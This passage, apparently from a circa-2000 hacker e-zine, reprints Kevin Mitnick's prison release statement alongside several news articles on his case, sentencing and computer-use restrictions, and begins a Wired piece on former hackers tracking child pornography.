I debated whether or not to include this in this issue since the news is saturated with Mitnick stories right now (at least they're taking notice) and decided it was valid to include it here in our archives. There are many more articles available on Mitnick, so I've just included his release statement.
Check out the sites http://www.freekevin.com/ or http://www.2600.com/ for more info Mitnick's Release Statement: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ January 21, 2000 Kevin Mitnick read the statement shown below upon his release from federal custody in Lompoc, California after nearly 5 years behind bars. Mr. Mitnick is the copyright holder of this statement, and hereby gives permission for limited reuse and republication under the Fair Use doctrine of U.S. Copyright Law. All other rights reserved. Good morning. Thank you all for taking the time to come out to Lompoc today, my first day of freedom in nearly five years. I have a brief statement to read, and I ask that you permit me to read my statement without interruption. First, I'd like to thank the millions of people who have visited the website kevinmitnick.com during my incarceration, and who took the time to show their support for me during the past five years. I relied on their support during the five years I've been incarcerated more than they will ever realize, and I want to thank them all from the bottom of my heart. As many of you know, I've maintained virtually complete silence during my incarceration -- I've refused dozens of requests for interviews from news organizations from around the world, and for very real reasons -- my actions and my life have been manipulated and grossly misrepresented by the media since I was 17, when the Los Angeles Times first violated the custom, if not the law, that prohibits publication of the names of juveniles accused of crimes. The issues involved in my case are far from over, and will continue to affect everyone in this society as the power of the media to define the "villain of the month" continues to increase. You see, my case is about the power of the media to define the playing field, as well as the tilt of that playing field -- it's about the power of the media to define the boundaries of "acceptable discussion" on any particular issue or story. 
My case is about the extraordinary breach of journalistic ethics as demonstrated by one man, John Markoff, who is a reporter for one of the most powerful media organizations in the world, the New York Times. My case is about the extraordinary actions of Assistant U.S. Attorneys David Schindler and Christopher Painter to obstruct my ability to defend myself at every turn. And, most importantly, my case is about the extraordinary favoritism and deference shown by the federal courts toward federal prosecutors who were determined to win at any cost, and who went as far as holding me in solitary confinement to coerce me into waiving my fundamental Constitutional rights. If we can't depend on the courts to hold prosecutors in check, then whom can we depend on? I've never met Mr. Markoff, and yet Mr. Markoff has literally become a millionaire by virtue of his libelous and defamatory reporting -- and I use the word "reporting" in quotes -- Mr. Markoff has become a millionaire by virtue of his libelous and defamatory reporting about me in the New York Times and in his 1991 book "Cyberpunk." On July 4th, 1994, an article written by Mr. Markoff was published on the front page of the New York Times, above the fold. Included in that article were as many as 60 -- sixty! -- unsourced allegations about me that were stated as fact, and that even a minimal process of fact-checking would have revealed as being untrue or unproven. In that single libelous and defamatory article, Mr. Markoff labeled me, without justification, reason, or supporting evidence, as "cyberspace's most wanted," and as "one of the nation's most wanted computer criminals." In that defamatory article, Mr. Markoff falsely claimed that I had wiretapped the FBI -- I hadn't -- that I had broken into the computers at NORAD -- which aren't even connected to any network on the outside -- and that I was a computer "vandal," despite the fact that I never damaged any computer I've ever accessed. Mr. 
Markoff even claimed that I was the "inspiration" for the movie "War Games," when a simple call to the screenwriter of that movie would have revealed that he had never heard of me when he wrote his script. In yet another breach of journalistic ethics, Mr. Markoff failed to disclose in that article -- and in all of his following articles about me -- that we had a pre-existing relationship, by virtue of Mr. Markoff's authorship of the book "Cyberpunk." Mr. Markoff also failed to disclose in any of his articles about this case his pre-existing relationship with Tsutomu Shimomura, by virtue of his personal friendship with Mr. Shimomura for years prior to the July 4, 1994 article Mr. Markoff wrote about me. Last but certainly not least, Mr. Markoff and Mr. Shimomura both participated as de facto government agents in my arrest, in violation of both federal law and journalistic ethics. They were both present when three blank warrants were used in an illegal search of my residence and my arrest, and yet neither of them spoke out against the illegal search and illegal arrest. Despite Mr. Markoff's outrageous and libelous descriptions of me, my crimes were simple crimes of trespass. I've acknowledged since my arrest in February 1995 that the actions I took were illegal, and that I committed invasions of privacy -- I even offered to plead guilty to my crimes soon after my arrest. But to suggest without reason or proof, as did Mr. Markoff and the prosecutors in this case, that I had committed any type of fraud whatsoever, is simply untrue, and unsupported by the evidence. My case is a case of curiosity -- I wanted to know as much as I could find out about how phone networks worked, and the "ins" and "outs" of computer security. There is NO evidence in this case whatsoever, and certainly no intent on my part at any time, to defraud anyone of anything.
Despite the absence of any intent or evidence of any scheme to defraud, prosecutors Schindler and Painter refused to seek a reasonable plea agreement -- indeed, their first "offer" to me included the requirement that I stipulate to a fraud of $80 million dollars, and that I agree never to disclose or reveal the names of the companies involved in the case. Have you ever heard of a fraud case where the prosecutors attempted to cover up the existence of the fraud? I haven't. But that was their method throughout this case -- to manipulate the amount of the loss in this case, to exaggerate the alleged harm, to cover up information about the companies involved, and to solicit the companies involved in this case to provide falsified "damages" consistent with the false reputation created by Mr. Markoff's libelous and defamatory articles about me in the New York Times. Prosecutors David Schindler and Christopher Painter manipulated every aspect of this case, from my personal reputation to the ability of my defense attorney to file motions on time, and even to the extent of filing a 1700 item exhibit list immediately before trial. It was the prosecutors' intent in this case to obstruct justice at every turn, to use the unlimited resources of the government and the media to crush a defendant who literally had no assets with which to mount a defense. The fact of the matter is that I never deprived the companies involved in this case of anything. I never committed fraud against these companies. And there is not a single piece of evidence suggesting that I did so. If there was any evidence of fraud, do you really think the prosecutors in this case would have offered me a plea bargain? Of course not. But prosecutors Schindler and Painter would never have been able to violate my Constitutional rights without the cooperation of the United States federal court system. As far as we know, I am the only defendant in United States' history to ever be denied a bail hearing. Recently, Mr.
Painter claimed that such a hearing would have been "moot," because, in his opinion, the judge in this case would not have granted bail. Does that mean that the judge in this case was biased against me, and had her mind made up before hearing relevant testimony? Or does that mean that Mr. Painter believes it is his right to determine which Constitutional rights defendants will be permitted to have, and which rights they will be denied? The judge in this case consistently refused to hold the prosecutors to any sort of prosecutorial standard whatsoever, and routinely refused to order the prosecutors to provide copies of the evidence against me for nearly four years. For those of you who are new to this case, I was held in pre-trial detention, without a bail hearing and without bail, for four years. During those four years, I was never permitted to see the evidence against me, because the prosecutors obstructed our efforts to obtain discovery, and the judge in this case refused to order them to produce the evidence against me for that entire time. I was repeatedly coerced into waiving my right to a speedy trial because my attorney could not prepare for trial without being able to review the evidence against me. Please forgive me for taking up so much of your time. The issues in this case are far more important than me, they are far more important than an unethical reporter for the New York Times, they're far more important than the unethical prosecutors in this case, and they are more important than the judge who refused to guarantee my Constitutional rights. The issues in this case concern our Constitutional rights, the right of each and every one of us to be protected from an assault by the media, and to be protected from prosecutors who believe in winning at any cost, including the cost of violating a defendant's fundamental Constitutional rights. What was done to me can be done to each and every one of you.
In closing, let me remind you that the United States imprisons more people than any other country on earth. Again, thank you for taking time out of your busy lives to come to Lompoc this morning, and thank you all for your interest and your support.

@HWA

24.1 More submitted Mitnick articles
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributions by Zym0t1c

Hacker Mitnick released Friday

For the first time since 1995, computer criminal Kevin Mitnick is a free man. But will he hack again? Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning... Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning -- and into an uncertain future.

Read the article online at: http://www.zdnet.com/zdnn/stories/news/0,4586,2425165,00.html

Read the (fine but short) Dutch article at: http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4462

Since this is *big* news, you can stay here and read the ASCII-version:

Hacker Mitnick released Friday
By Kevin Poulsen, ZDNet News
UPDATED January 21, 2000 9:30 AM PT

For the first time since 1995, computer criminal Kevin Mitnick is a free man. But will he hack again? Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning... Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning -- and into an uncertain future. The 36-year-old hacker was greeted at the gate by friends and family members.
His mother will drive him to Los Angeles, where his first order of business will be to obtain a driver's license, report to his new probation officer and see a doctor about injuries he suffered in a prison bus accident last year.

"He's having neck pains, and back and shoulder pains," said Reba Vartanian, Mitnick's grandmother. "He hasn't had a regular doctor in five years."

A free man for the first time since 1995, he will live in the Los Angeles suburb of Westlake Village with his father, Alan Mitnick, a general contractor.

Less clear is what Mitnick is going to do for a living. Under court order, the hacker is banned for three years from using any kind of computer equipment without the prior written permission of his probation officer -- a restriction that even the court acknowledged would affect his employability.

"He's experiencing a lot of frustration over the things he can't do," said Eric Corley, editor of the hacker magazine 2600 and the leader of a "Free Kevin" grass-roots movement. "Keep in mind this is someone who's been kept away from these things for five years, and when he gets out he won't even be able to touch them."

Does incarceration cure an addict?

The restrictions, and long history of recidivism, make one former friend and partner-in-crime pessimistic about Mitnick's future.

"Do you cure a drug addict or alcoholic by incarceration on its own?" asked Lew DePayne, rhetorically. "Do you cure him by taking away his ability to earn a living?"

Mitnick and DePayne became friends in the late 1970s, when they were both teenagers. Together, they explored and manipulated the telephone network as Los Angeles' most notorious "phone phreaks."

In the 1980s, DePayne seemingly dropped out of the scene, while Mitnick moved on to corporate computers and networks, developing a penchant for cracking systems in search of proprietary "source code," the virtual blueprints for a computer program or operating system.
Mitnick had already been in a series of minor skirmishes with the law when, in 1989, he suffered his first adult felony conviction for cracking computers at Digital Equipment Corp. and downloading source code. He served one year in federal custody, followed by three years of supervised release.

In 1992, Mitnick was charged with a violation of his supervision for associating with DePayne again. He went underground and online, using the Internet to crack computers belonging to such cell phone and computer makers as Motorola (NYSE: MOT), Fujitsu and Sun Microsystems (Nasdaq: SUNW) and to copy more proprietary source code.

The FBI captured him on Feb. 15, 1995, when computer security expert Tsutomu Shimomura suffered an attack on his machine and responded by tracking Mitnick to his hideout in Raleigh, N.C.

Shimomura and New York Times reporter John Markoff went on to write the book "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It."

Shimomura and Markoff sold the movie rights to Miramax Films, who cast Skeet Ulrich as Mitnick. But since shooting wrapped on the project in December 1998 the movie has languished on the shelf with no known theatrical release date, surrounded by swirling rumors of a direct-to-video or cable TV release. Miramax publicists didn't return telephone inquiries about the project.

Mitnick's arrest began a series of courtroom battles over procedures and evidence that finally ended last year in a plea agreement. The hacker pleaded guilty in March 1999 to seven felonies and admitted to his Internet hacking.

In August 1999, Judge Marianna Pfaelzer sentenced him to 46 months in prison, on top of an earlier 22-month sentence for the supervision violation and cell phone cloning. With credit for his lengthy period of pretrial custody, and some time off for good behavior, Mitnick's served just under five years in prison.
"My sincere hope is that he gets his act together and complies with the conditions of his supervised release and doesn't engage in further hacking activity," said Assistant U.S. Attorney Christopher Painter, one of Mitnick's two federal prosecutors.

Painter's work on the Mitnick case helped propel him to a position as deputy chief of the U.S. Department of Justice's computer crime and intellectual property section in Washington, D.C. He begins at the DOJ in March.

"I think that the significance of this case is that he was so prolific. He not only had done this once before, but he did it on such a large scale," Painter said. "If past ends up being prologue, then certainly we'll go back to court and deal with it at that time."

From hacking to ham?

Greg Vinson, one of Mitnick's defense attorneys, foresees a rosier future for the hacker, perhaps with a job that exploits his famous ability to "social engineer" people into doing his bidding.

"I think he's had a number of different offers to kind of do PR-type of work," said Vinson, who also points out that Mitnick might still get a computer job. "You have to remember the order says, 'Without the prior express permission of the probation office.' So it's not absolutely prohibited."

If Mitnick can't use computers, he reportedly hopes to indulge his love for technology by returning to amateur radio, a childhood passion. Federal Communications Commission records show that Mitnick's license expired last month. According to Kimberly Tracey, a ham radio operator in Los Angeles and a friend of Mitnick's, he's been scrambling to renew it.

"This is going to be part of Kevin's life, because they've taken away computers and everything else," said Tracey. "I hope they don't take away this."

Mitnick was unavailable for comment on his imminent release. Sources close to the hacker say he granted the CBS news show "60 Minutes" an exclusive interview last week, which is scheduled to air Sunday.
But in an interview with ZDNet News last July, Mitnick complained about his treatment by the government prosecutors, who he said were "grossly exaggerating the losses in the case and the damages I caused." (See: Mitnick says, "I was never a malicious person.")

DePayne: Anger a major stumbling block

DePayne, Mitnick's former friend and co-defendant, worries that Mitnick's anger will work against him in his new life.

"I don't know if that's ever going to go away; I don't know if he'll be able to deal with it," said DePayne, speaking from his home in Palo Alto, Calif., where he's serving six months house arrest for aiding Mitnick's hacking during his fugitive years. "That's going to be a major stumbling block for him going forward."

DePayne said he last heard from Mitnick the night of his arrest, on a message left on his answering machine.

Now 39 years old, divorced and heading a small Internet company of his own, DePayne insists he doesn't plan on associating with the impish hacker he first met as a brash teenager two decades ago.

"I can't be fooling around with these stunts and practical jokes that Kevin might want to fool around with," said DePayne. "I'll miss Kevin. I won't miss the trouble he brings to the table."

Kevin Poulsen is a former hacker. He writes a weekly column for ZDTV's CyberCrime.

____________________________________________________________________________

Mitnick: I was manipulated

That's how hacker Kevin Mitnick feels after almost five years behind bars.

Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years.
Read the article online at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2425686,00.html?chkpt=zdnntop

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick: I was manipulated
By Robert Lemos, ZDNet News
UPDATED January 21, 2000 3:41 PM PT

Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years.

"Prosecutors ... manipulated every aspect of this case from my personal reputation, to the ability of my defense attorney to file motions in time, and even to the extent of filing a 1,700-item exhibit list immediately before a trial," said Mitnick, reading from a three-page statement to reporters gathered near the Lompoc, Calif. prison facility, minutes after being released from the medium-security prison.

Almost five years ago, federal authorities arrested Mitnick on a 25-count indictment relating to misuse of Pacific Bell equipment for illegal wiretaps and copying proprietary source code from Motorola, Sun Microsystems Inc., NEC Corp. and Novell, among others.

"My case is one of curiosity," said Mitnick. "There was no intent to defraud anyone of anything."

New York Times' reporter John Markoff covered the latter portion of the two-and-a-half year pursuit of Mitnick, and in a July 4, 1994, article called him "Cyberspace's most wanted."

Mitnick blames the hype surrounding his elusive flight from authorities and his subsequent arrest on Markoff's article. In addition, the 36-year-old ex-hacker claims that Markoff crossed the line by bringing authorities and computer expert Tsutomu Shimomura together to track him down. Mitnick went as far as to call the article libelous and defamatory.
In a Friday morning interview, Markoff stood by his reporting, saying that the allegations were "really disappointing to me because it suggests that in the past five years, and perhaps in the last 20 years, Kevin has not learned anything. What he might have learned from all his time in prison is that it is wrong to break into other people's computers. I don't think it is any more complex than that."

Markoff pointed out that Mitnick had been arrested five times in the last 20 years for computer-related crimes.

"The problem is, and the reason the judge kept him away from computers, (is that) this is the fifth time that he has been arrested. It's not like they haven't given him chances," said Markoff.

Markoff also denied any ethical breach.

"I won't get into the specifics on those three cases," Markoff said. "I want to say that I stand by my story, and to note that it was written while Kevin was a fugitive from four law enforcement agencies, and that's why it was written."

In court, Mitnick also claims he didn't get a fair shake.

Looking tired and much thinner than five years ago, the bespectacled cybercriminal blamed prosecution for blocking his defense from acting on his behalf.

"Their method (in) this case was to manipulate the amount of loss to exaggerate the alleged harm," he said. "I've acknowledged since my arrest in February, 1995, that the actions I took were illegal, and that I committed invasions of privacy. But to suggest without reason or proof, as did Mr. Markoff and the prosecutors in this case, that I had committed any type of fraud whatsoever, is simply untrue, and unsupported by the evidence."

Damages 'grossly inflated'

In total, the prosecution estimated damages at $80 million by including the full R&D costs of the applications and source code that Mitnick copied, even though none of the code was ever sold to another company or is known to have been used by a competitor.
"Everybody realizes that those (estimates) were greatly inflated," said Jennifer Granick, a San Francisco defense attorney, who represented hacker Kevin Poulsen in litigation following that hacker's release from prison. (Poulsen is a ZDNet News contributor.)

The number may sound familiar. That's because David L. Smith, who pleaded guilty to writing and releasing the Melissa virus in December, similarly admitted to the prosecutor's assessed damages of $80 million.

It's no coincidence: Under federal law that is the maximum amount accounted for by sentencing guidelines. In fact, it is usually the major factor in determining the length of jail time.

That leads to a skewed pursuit of justice, said Granick. "The criminal courts are here to deal with societal wrongs," she said. "It is not their primary purpose to recompense the victims."

"I hope that the Kevin Mitnick case is the last case of the great '80s hacker hysteria," she continued. "I hope that we won't have the same kind of hype in the future so that people can get a fair shake in the media and in court."

The U.S. Attorney's office could not comment by press time.

Kevin Poulsen contributed to this report.

____________________________________________________________________________

The case of the kung fu 'phreak'

Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about his kung fu ability? The real kung fu prankster is unmasked.

Read the article online at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2425425,00.html

Since this is *big* news, you can stay here and read the ASCII-version:

The case of the kung fu 'phreak'

Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about his kung fu ability? The real kung fu prankster is unmasked.
By Kevin Poulsen, ZDNet News
January 21, 2000 11:59 AM PT

Two days after computer security expert Tsutomu Shimomura suffered the now-legendary Christmas Day 1994 hack-attack that launched his search for Kevin Mitnick, a mysterious message left on his voice mail box added real-world menace to the cyberspace crime.

"Damn you, my technique is the best," said an odd voice in a faux-British accent. "I know sendmail technique, and my style is much better ... Me and my friends, we'll kill you."

Three days later the caller left another message, this time beginning with a kung fu scream and affecting the voice of an actor in a martial arts film: "Your security technique will be defeated. Your technique is no good."

In a third message, on Feb. 4, 1995, the caller chided Shimomura, who he called "grasshopper," for mentioning the messages in a Newsweek article on the intrusion and for putting digitized copies on the Internet. "Don't you know that my kung fu is the best?"

The taunting phone calls were presumed to be from Shimomura's intruder, and they became a fixture in the Shimomura vs. Mitnick manhunt story. Digitized copies can be found on the official Web site for Shimomura's book, "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It."

The equation of hacking with kung fu fighting has become a cultural touchstone in its own right, and on more than one occasion the "Lone Gunmen" hackers on Fox's "The X-Files" have been heard to mutter, "My kung fu is the best."

The real kung fu 'phreak'

The only problem is, the thinly disguised voice never sounded at all like Kevin Mitnick, and two of the messages came after the hacker had been arrested.

"I heard that this guy named Shimomura had been hacked ... So I just thought, What the hell, I'd leave some voice mails," says 31-year-old Zeke Shif. "I used to watch kung fu movies a lot."
Under the handle "SN," Shif once had a solid reputation in the computer underground as a "phone phreak" (i.e., phone hacker). But he says that, by 1995, his fear of "The Man" had long since scared him straight; he simply succumbed to the temptation to make some prank phone calls.

"I thought I'd be funny," says Shif, who like many hackers from the early 1990s has gone on to work in the computer security trade, for Virginia-based Network Security Technologies Inc.

The matter became less amusing when Shif read the news reports on Feb. 15, 1995.

"I found out Mitnick got caught, and they were trying to link that to the voice mail," says Shif, who responded by calling Shimomura again. "I left a pre-emptive message, saying, listen, this has nothing to do with any Mitnick or anything, I'm just making fun of kung fu movies."

And this time, he didn't call him grasshopper.

____________________________________________________________________________

Mitnick Released

Hacker Kevin Mitnick, released after nearly five years in prison, blames the media and federal prosecutors for his imprisonment.

Read the article online at:
http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2118614,00.html

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick Released

Hacker Kevin Mitnick, released after nearly five years in prison, blames the media and federal prosecutors for his imprisonment.

By Iolande Bloxsom
January 21, 2000

Convicted hacker Kevin Mitnick was released early this morning from federal prison in Lompoc, California. Possibly the most famous hacker ever, Mitnick was arrested in February of 1995, and has spent almost five years in prison.

In a prepared statement, Mitnick had harsh words for both the media and federal prosecutors, both of whom he blamed for his long incarceration. The media "grossly misreported" his case and created what he called the "villain of the month."
He also railed against the media for "defin[ing] what is 'acceptable discussion'."

Mitnick singled out John Markoff, a reporter for The New York Times, accusing him of "libelous and defamatory reporting -- and I use the word reporting in quotes." He charged that Markoff's articles had facts that were untrue, that were unproven, and that Markoff failed to disclose a previous relationship. (Mitnick appeared in Cyberpunk, a book Markoff co-wrote with Katie Hafner in 1995.)

Finally, Mitnick claimed that the journalist "is a millionaire" now because of his reporting on the convicted hacker.

In a later interview with ZDTV's Janet Yee, Markoff said he stood by his reporting.

However, Mitnick had equal censure for prosecutors David Schindler and Christopher Painter, who, he claimed "went as far as holding me in solitary confinement," to try to force him to plead guilty. He says, though, that his crime was one of trespass, rather than fraud. "I never deprived companies of anything... there was never any evidence of fraud."

Mitnick pleaded guilty on March 26, 1999, to seven felonies, including unauthorized intrusion into computers at cellular telephone companies, software manufacturers, ISPs, and universities. He also admitted to illegally downloading proprietary software from some of these companies.

In August, US District Court Judge Marianna Pfaelzer sentenced Mitnick to 46 months in prison and ordered him to pay $4,125 in restitution. She also ordered Mitnick not to touch a computer or cellular phone without written approval from his probation officer.

The sentence, governed by a plea agreement between Mitnick and his prosecutors, ran on top of the 22 months he already received for cell-phone cloning and a probation violation, for a total of 68 months. With credit for his lengthy pretrial custody and some time off for good behavior, Mitnick served just less than five years in prison.

Mitnick is headed back to Los Angeles, where his family lives.
By Iolande Bloxsom
January 21, 2000

____________________________________________________________________________

Mitnick's Digital Divide

/* This is news from two weeks ago, but still a headline */

It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll be trapped in 1991.

Read the online article at:
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2128328,00.html

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick's Digital Divide

It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll be trapped in 1991.

By Kevin Poulsen
January 12, 2000

On Friday, January 21, hacker Kevin Mitnick will go free after nearly five years behind bars. But when he walks out the gates of the Lompoc federal correctional institution in California, he'll be burdened with a crippling handicap: a court order barring him for up to three years from possessing or using computers, "computer-related" equipment, software, and anything that could conceivably give him access to the Internet.

These anti-computer restrictions are even more ridiculous today than when I faced them upon leaving federal custody in June, 1996. In the wired world of 2000, you'd be hard pressed to find a job flipping burgers that didn't require access to a computerized cash register, and three years from now McDonald's applicants will be expected to know a little Java and a smattering of C++.

Since Mitnick's arrest in 1995, the Internet has grown from a hopeful ditty to a deafening orchestral roar rattling the windows of society. The importance of computer access in America has been acknowledged by the White House in separate initiatives to protect technological infrastructure from "cyberterrorists," and to bridge the so-called digital divide between information haves and have-nots.

"We must connect all of our citizens to the Internet," vowed President Clinton last month. He was not referring to Kevin Mitnick.
Mitnick, dubbed the "World's Most Notorious Hacker" by Guinness, pleaded guilty on March 26 to seven felonies, and admitted to cracking computers at cellular telephone companies, software manufacturers, ISPs, and universities, as well as illegally downloading proprietary software. Though he's never been accused of trying to make money from his crimes, he's been in and out of trouble for his nonprofit work since he was a teenager.

So, the theory goes, keeping Mitnick away from computers will deprive a known recidivist of the instruments of crime and set him on the road to leading a good and law-abiding life.

I've heard that theory from prosecutors, judges and my (then) probation officer. They all compare computers to lock picks, narcotics, and guns -- everything but a ubiquitous tool used by a quarter of all Americans and nearly every industry.

Mitnick, we should believe, will be tempted in the next year or so to crack some more computers and download some more software. But when the crucial moment comes for him to commit a felony that could land him in prison for a decade, his fingers will linger indecisively over the keyboard as he realizes, "Wait! I can't use a computer! My probation officer will be pissed!"

The fact is, if Mitnick chooses crime, he won't be deterred by the 11 months in prison that a technical supervised release violation could carry. These conditions only prevent him from making legitimate use of computers.

Mitnick's rehabilitation is up to him. But the system shouldn't throw up obstructions by keeping him away from the mainstream, on the sidelines, and out of the job market. His probation officer will have the power to ease his restrictions, perhaps by allowing him to get a computer job with the informed consent of his employer. That would be a good start.

January 21 will be a happy day for Mitnick, his family, and friends. But getting out of prison after a long stretch carries challenges too.
Nobody is served by stranding the hacker on the wrong side of the digital divide.

____________________________________________________________________________

Mitnick: 'I was never a malicious person'

/* This is news from a few months ago, but still a headline */

Hacker files motion accusing government of misconduct -- goes on the record with ZDNN. 'The federal government manipulated the facts.'

Read the online article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2306704,00.html?chkpt=zdnnrla

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick: 'I was never a malicious person'

Hacker files motion accusing government of misconduct -- goes on the record with ZDNN. 'The federal government manipulated the facts.'

By Kevin Poulsen, ZDNet News
July 30, 1999 4:36 PM PT

Kevin Mitnick and his attorneys are asking a federal judge to unseal a court filing that they claim proves the government was guilty of misconduct while building its case against the hacker. The goal, says Mitnick in a rare interview, is to clear his name.

"At the beginning of this case the federal government manipulated the facts to allege losses that were grossly inflated," Mitnick said in a telephone interview Thursday night from the Los Angeles Metropolitan Detention Center. "Hopefully, if the court considers this motion and rules upon its merits, it will clear me publicly of the allegations that I caused these significant losses."

The motion, filed by defense attorney Don Randolph on July 22, is the latest conflict in a case that's remained unusually acrimonious, considering that both sides reached a plea settlement in March. Under the terms of the agreement, Mitnick pleaded guilty to seven felonies and admitted to penetrating computers at such companies as Motorola (NYSE:MOT), Fujitsu and Sun Microsystems, (Nasdaq:SUNW) and downloading proprietary source code. On Aug. 9, he's expected to be sentenced to 46 months in prison, on top of the 22 months he received for cell phone cloning and an earlier supervised release violation.

Mitnick vexed by 'snowball effect'

The only sentencing issue left unresolved is the amount of money Mitnick will owe his victims. Prosecutors are seeking $1.5 million in restitution -- a modest figure compared to the more than $80 million the government quoted to an appeals court last year, when it successfully fought to hold the hacker without bail.

That figure, though no longer promulgated by prosecutors, vexes Mitnick, who sees a "snowball effect" of bad press that began with a 1994 front-page article in the New York Times.

"Because of this assault that was made upon me by John Markoff of the New York Times, then the federal government grossly exaggerating the losses in the case and the damages I caused, I have a desire to clear my name," Mitnick said. "The truth of the matter is that I was never a malicious person. I admit I was mischievous, but not malicious in any sense."

Markoff reported on Mitnick for the New York Times, and went on to co-author Tsutomu Shimomura's book, "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It," slated as an upcoming movie from Miramax. Markoff's portrayal of Mitnick, and the profit it ultimately earned him, has been the subject of some criticism from Mitnick's supporters, and raised eyebrows with a handful of journalists.

Markoff's most enduring Mitnick anecdote is the story that the hacker cracked NORAD in the early 1980s, a claim that was recycled as recently as last May by another New York Times reporter.

"I never even attempted to access their computer, let alone break into it," Mitnick said. "Nor did I do a host of allegations that he says I'm guilty of."

For his part, Markoff says of the NORAD story: "I had a source who was a friend of Kevin's who told me that. I was not the first person to report it, nor the only person to report it."

Government collusion?

The July 22 motion filed by Mitnick's attorney accuses the government of coaching victim companies on how to artificially inflate their losses.

The filing is based on documents Randolph subpoenaed from Sun, which show that shortly after Mitnick's February 1995 arrest, the FBI specifically instructed Sun to calculate its losses as "the value of the source code" Mitnick downloaded, and to keep the figure "realistic."

Following the FBI's advice, Sun estimated $80 million in losses based on the amount they paid to license the Unix operating system. Six other companies responded, using software development costs as the primary calculus of loss.

The total bill came to $299,927,389.61, significantly more than the $1.5 million the government says Mitnick inflicted in repair and monitoring costs, and theft of services and the $5 million to $10 million both sides stipulated to for purposes of sentencing.

"At the beginning of this litigation, the government misrepresented to the federal judiciary, the public and the media the losses that occurred in my case," Mitnick said.

To Randolph, it all smacks of collusion.

"What comes out from the e-mails that we have, is that the so-called loss figures solicited by the government were research and development costs at best, fantasy at worst," he said. "I would classify it as government manipulation of the evidence."

However, prosecutor David Schindler dismissed Randolph's claims as "silly and preposterous."

"What would be inappropriate is to tell them what dollar amount to arrive at. In terms of the methodology, in terms of what is to be included in loss amounts, that direction is something we often provide because we're aware of what components are allowable under law, and which components are not," he said.
Schindler said development costs are a valid indicator of victim loss, but acknowledges that putting a dollar figure on software can be difficult.

Mitnick claims cover-up

Mitnick and his attorney both say there's more to the story, but they can't talk about it. At Mitnick's last court appearance on July 12, the judge granted a government request that any filings relating to victim loss be sealed from the public.

"As much as the government would like to, you can't take the recipe for ice and file it under seal and have it become confidential," said Mitnick, who, along with his attorney, is challenging the confidentiality of the loss information, and asking for the motion to be unsealed.

Mitnick claims he smells a cover-up.

"The government should not be permitted to bury the truth of the case from the public and the media by seeking and obtaining a protective order to essentially force me to enter a code of silence," he said.

"Our only concern, as it has been from day one, is the protection of the victims of Mitnick's crimes," prosecutor Schindler said. "Why Mitnick and his lawyers want to continue to harass, embarrass and abuse them remains a mystery to us, but it's something that we will continue to oppose vigorously."

Although the software costs are no longer being used against his client, Randolph claimed that by "manipulating the loss figures," the government raises the issue of whether even the more modest $1.5 million calculation is accurate. In the sealed motion, he's seeking an evidentiary hearing to explore the matter, and asking that Mitnick be released on a signature bond pending that hearing.

And if Mitnick winds up owing money anyway?

"We're asking for sanctions that the government pay the restitution," Mitnick said, "and that the judge recommend that I be immediately designated to a halfway house for the government's misconduct in this case."
Excerpts of the Sun documents are available on the Free Kevin Web site, maintained by members of a tireless grass-roots movement that's protested the hacker's imprisonment for years.

"I'd like to sincerely thank all my friends and supporters for all the support they've given me over this long period of time," Mitnick said. "I'd like to thank them from my heart."

Kevin Poulsen writes a weekly column for ZDTV's CyberCrime.

@HWA

25.0 Hackers vs Pedophiles, taking on a new approach.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.wired.com/news/print/0,1294,33869,00.html

Hackers' New Tack on Kid Porn
by Lynn Burke
3:00 a.m. 3.Feb.2000 PST

Kent Browne used to spend most of his free time hacking Web sites, erasing hard drives, disabling servers, and knocking folks out of chat rooms. Like many hackers, he subscribed to the classic Machiavellian argument, that the end justifies the means -- especially when the end was eradicating child pornography on the Internet.

In early December, he and some fellow hackers from New York to Australia started a group called Condemned, and announced their intention to take down child pornographers by any means necessary.

But when Browne, 41, talked to Parry Aftab, an attorney who heads the biggest and most well-known of the anti-child pornography groups -- Cyber Angels -- he had a sudden change of heart.

"She said that the one problem we would have would be with law enforcement. If they knew we were doing illegal stuff, they wouldn't touch us with a 10-foot pole," he said. "Quite frankly, I'm an older guy. I've got two kids. And I don't want to take any chances."

So now he and the rest of Condemned's loosely organized volunteers use specially designed software and good old-fashioned Internet search engines to ferret out the bad stuff and tip off federal agents in the U.S. Customs Service and the FBI.

They're not alone. Natasha Grigori and her volunteer staff at antichildporn.org have also decided to hang up their hacking shoes.
